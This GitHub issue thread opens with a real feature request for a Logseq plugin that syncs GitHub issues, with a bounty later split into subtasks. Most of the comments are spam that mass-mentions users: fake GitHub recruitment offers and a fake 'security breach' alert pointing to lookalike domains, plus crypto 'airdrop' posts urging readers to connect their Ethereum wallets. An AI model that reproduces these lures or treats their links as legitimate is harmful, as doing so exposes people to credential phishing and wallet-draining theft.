### ISSUE TITLE
develop advanced fetch for complex project management

### ISSUE THREAD

**Issue by mastercyb** [mastercyb/loghub#1]
- problem
	- complex project management using github web interface is slow and ugly
	- impossible to have consolidated view of local knowledge graph tasks and github tasks
	- no offline read only access to github issues
- solution: logseq plugin with one way sync of all issues and its metadata to logseq
	- more simple example [logseq-github-plugin](https://github.com/sawhney17/logseq-github-plugin/blob/main/index.ts) is limited and unstable
	- plugin settings
		- personal github access token
		- array of github users and organizations
		- logseq page to sync
		- interval for getting updates
	- manual fetch of all issues and its metadata for initial sync or fixing mistakes
		- in this case target page must be completely rewritten
		- must include all issues including closed (important)
	- scheduled update from github events api for faster sync
	- button in logseq extension menu. on click
		- display status of initial sync (how much issues synced)
		- information on last update
		- button for manual update with complete resync
		- button for checking updates
- reward: 200 GBOOT for complete working plugin merged into this repo. UPDATE: [split into small bounties](https://github.com/mastercyb/loghub/issues/1#issuecomment-2008698869)
- example of the block for every issue or pull request (for issue do not display `pull`)
	- TODO [[pull]] [[cybercongress]]/[[cyb-ts]] one way sync of github issues with logseq [[@dasein]] [146](https://github.com/cybercongress/cyb-ts/issues/1092)
		- links::
			- sync github issues with logseq [143](https://github.com/cybercongress/cyb-ts/issues/1092)
		- labels:: [[bug]]
		- milestones:: [[win them all]]
		- projects:: [[build town]]
		- creator:: [[@mastercyb]]
		- assignee:: [[@mastercyb]]
- necessary fields from github api
	- state: must map to [[logseq]] todo objects
	- body
	- location
		- owner
		- repository
		- number
	- users
		- creator
		- assignee
		- asignees
	- meta
		- links to pull requests or issues
		- is pull request
		- labels
		- milestones
		- projects: accessable through graphql github api
	- dates
		- created
		- updated
	- result must be pull requested into

**Comment by mastercyb** [comment]
@happylolonly is working on update

**Comment by alex-chan** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](http://jobs.githubtalentcommunity.online/auth) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
coolmian, @Alejandro-MartinG, @djent, @Oleg0s, @mar2194, @anilkarip, @par94, @dvzhang, @panamantis, @KOSMIKSHAPE, @0xknstntn, @KMFODA, @davidzshi, @dolchain, @qbig, @arielcortez, @SongTianYe, @eicho410, @acexy, @bigsml

**Comment by ianaditama26** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
SilasKenneth, @JOHNSNOWGG, @rming76, @SerCeMan, @cbachmeier, @yusufali7777, @Rihamdel, @minhlucvan, @vclemenzi, @Rey2007, @ANThonyRix, @tacshi, @x4no2, @iosiv23, @fhaftadi, @Herman-10, @Axwerbit-y, @Ysuiwagmi, @RosesWasabiQuantTrendy, @Atef-AK

**Comment by pavana21** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
tuxcanfly, @souity, @myjeffxie, @katerinna-e, @TJKoury, @janusdotai, @LandonPattison, @kocoten1992, @onetxpunch, @nkmry, @neiljdo, @kudkudak, @justheuristic, @stylophone, @acexy, @donyeveworld, @wiertzbl, @worthmining, @maaalex, @michaelwayman

**Comment by aasazali-seekasia** [comment]
Hey there,

We've got some thrilling news for you! GitHub is currently looking for skilled Developers to join our team. This is an incredible opportunity with a competitive salary of $180,000/year, along with a host of attractive benefits.

Interested in taking your career to the next level? Don't miss out! Click [here](https://githubtalentcommunity.githubcareers.online/) to apply and secure your spot.

Looking forward to potentially welcoming you aboard!

Best regards,  
GitHub Recruitment Team
armdev, @gvsharma, @zetbaitsu, @isdom, @rooseek, @fming09, @vulcangz, @debuggor, @kayfhan, @stepsal, @nikolay, @meyer-net, @agdolla, @cype, @gkarugi, @aalok05, @dector, @JianqiaoHu, @EslamHiko, @chanthana01

**Comment by jimga150** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
jochasinga, @jdichev, @drobakowski, @iontower, @hitenkoku, @mikkohakki, @alex-stout, @Rajiv349, @sinan-aumarah, @tomasgarro, @leongkui, @vidalpaul, @m-roll, @liaopeiyuan, @FelixMGC, @sch17, @Fyphen1223, @jackpooley, @0xsj, @adamwojt

**Comment by jimga150** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
jrtzlff, @capitulation, @waysketch, @EarlPitts, @devcorn, @gordo1337, @jorisdral, @DavidLeoni, @nimicminic, @aathiramanoj, @alexinslc, @ddowding, @NYStud, @bmateus, @MorganOnCode, @aecdanjun, @XatMassacrE, @bertschneider, @mbenroberts, @jdnichollsc

**Comment by jimga150** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team

**Comment by Elenchikk** [comment]
yes

**Comment by mastercyb** [comment]
i decide to split bounty and tasks into several parts

- https://github.com/mastercyb/loghub/issues/3 done by @happylolonly
- https://github.com/mastercyb/loghub/issues/5
- https://github.com/mastercyb/loghub/issues/7
- https://github.com/mastercyb/loghub/issues/6
- https://github.com/mastercyb/loghub/issues/4

**Comment by creer** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
fjq123456, @ravishtiwari, @christianpv, @igordcard, @thomasschaller1, @hyeongjun-dev, @juliavi, @brainiacdc5, @mkc188, @Geddup, @NikhilDoWhile, @BowTiedZorro, @, @jet10000, @savage69kr, @MeherRoy, @robertu7, @morganpolotan, @phbai, @fZAXwS, @f055, @migbash, @eunicepring05271990, @fairhopeweb, @brockers, @kurohai, @toddwprice, @appfromape, @wolfg1969, @davidrpmorris, @Craignewkirk, @marianod92, @JonKrone, @awalo666, @sbkoth, @GonZo, @dsaint, @klion26, @Volland, @marcusmonteiro, @ampon0001, @niksmac, @cuevasm, @kristafari, @azell, @panjizhi, @chungquantin, @crackcomm, @frrp, @raulsann

**Comment by AbstractsMachine** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!

**Comment by masa2el** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
zoglun, @V3NTUR3S, @mattr-2102, @Mussel222, @MoAtefAmer, @0xmixas, @hqtoan94, @0xRay44, @mmjahanara, @sebatyler, @aman304gupta, @nicksonfleury3, @MikeLockz, @gbdsantos, @borealcoding, @aabril, @Octopus86225, @ZhichenLiang, @mchlmicy, @skycccu, @LinAsan-1205, @dibashthapa, @rkm0959, @po-et, @millionlion, @arberiii, @keliz3, @JeffKGabriel, @Anish-Agnihotri, @0x0918, @GotHima, @achiz, @volf52, @henrytirla, @0xHarrington, @0xgui, @techgaun, @happyconcepts, @abcijkxyz, @chaoliu92, @DanielaRuizA, @itinance, @divee789, @pjkendall982, @hryer, @JamesEarle, @fns12345, @phantomk, @CocoaPriest, @nnkken
